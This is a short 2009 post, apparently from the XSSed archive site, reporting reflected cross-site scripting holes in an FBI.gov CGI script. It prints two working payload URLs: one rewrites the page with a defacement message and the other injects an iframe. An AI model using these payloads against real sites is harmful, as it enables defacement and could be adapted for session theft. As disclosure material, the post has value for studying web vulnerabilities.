Home
|
News
|
Articles
|
Adv.
|
Submit
|
Alerts
|
Links
|
XSS info
|
About
|
Contact
XSS Archive
|
XSS Archive
|
TOP Submitters
|
TOP Submitters
|
TOP Pagerank
|
FBI.gov xssed!
Written by Kevin Fernandez
Friday, 9 January 2009
Ok it is not the first time, but they had fixed them all. It will probably be the third or fourth time they try to address this damn cgi! Here is the XSS that Babaconda submitted to us (works only in Internet Explorer):
http://www.fbi.gov/cgi-bin/outside.cgi?http://www.google.com/</script><script/defer>document.body.innerHTML='xssed'+unescape('%20')+'by'+unescape('%20')+'babaconda'</script>
For the iframe fans, here's one:
http://www.fbi.gov/cgi-bin/outside.cgi?http://www.fbi.gov/</script><script/defer>document.body.innerHTML='<iframe/src=http://xssed.com>'</script>
Here is the mirror:
http://www.xssed.com/mirror/46852/
Have a look at the previous XSS affecting *.fbi.gov:
http://www.xssed.com/archive/domain=fbi.gov
Share this content:
Home
|
News
|
Articles
|
Advisories
|
Submit
|
Alerts
|
Links
|
What is XSS
|
About
|
Contact
|
Some Rights Reserved.
Ok it is not the first time, but they had fixed them all. It will probably be the third or fourth time they try to address this damn cgi! Here is the XSS that Babaconda submitted to us (works only in Internet Explorer):
